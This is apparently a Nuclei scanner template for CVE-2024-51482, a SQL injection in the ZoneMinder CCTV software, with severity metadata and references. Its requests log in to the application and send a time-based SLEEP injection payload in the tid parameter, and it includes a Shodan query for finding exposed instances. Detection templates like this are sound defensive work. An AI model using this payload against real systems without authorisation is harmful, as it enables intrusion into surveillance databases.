漏洞描述
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65.
id: CVE-2024-51482
info:
name: ZoneMinder v1.37.* <= 1.37.64 - SQL Injection
author: ritikchaddha
severity: critical
description: |
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65.
impact: |
Attackers can exploit this vulnerability to compromise system security and integrity.
remediation: |
Apply the latest security patches and updates to address this vulnerability.
reference:
- https://securityonline.info/zoneminders-cve-2024-51482-a-10-10-severity-vulnerability-exposes-sql-databases/
- https://github-production-user-asset-6210df.s3.amazonaws.com/104687644/381894613-3cc50e51-68cf-4540-8225-4288f73e0c08.mp4?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241129%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241129T074108Z&X-Amz-Expires=300&X-Amz-Signature=9cc5b01b0482cbd5573c223a1d44e9ffed10afd7d042d76e8308dfcf3bb7e8a5&X-Amz-SignedHeaders=host
- https://nvd.nist.gov/vuln/detail/CVE-2024-51482
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2024-51482
cwe-id: CWE-89
epss-score: 0.50038
epss-percentile: 0.97729
cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*
metadata:
max-request: 4
vendor: zoneminder
product: zoneminder
shodan-query: title:"ZoneMinder"
tags: cve,cve2024,zoneminder,sqli,authenticated,vuln
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: word
part: body
words:
- "ZoneMinder</a>"
- "ZoneMinder Login</h1>"
- "<title>ZoneMinder"
condition: or
internal: true
- raw:
- |
POST /zm?view=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=login&postLoginQuery=&username={{username}}&password={{password}}
- |
GET /zm/index.php?view=request&request=event&action=removetag&tid=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "{\"result\":\"OK")'
internal: true
- raw:
- |
@timeout: 30s
GET /zm/index.php?view=request&request=event&action=removetag&tid=1+AND+(SELECT+6435+FROM+(SELECT(SLEEP(7)))AbUy) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100ea5ccd81e69ab2580d6fe81f9eb89f6d2966493343cfd05591d4ab1c04f9682d0220176aa0f9d94e241e8890b71479b52b49ff0e5813cccdd3e9e1630f1ce5f5a22d:922c64590222798bb761d5b6d8e72950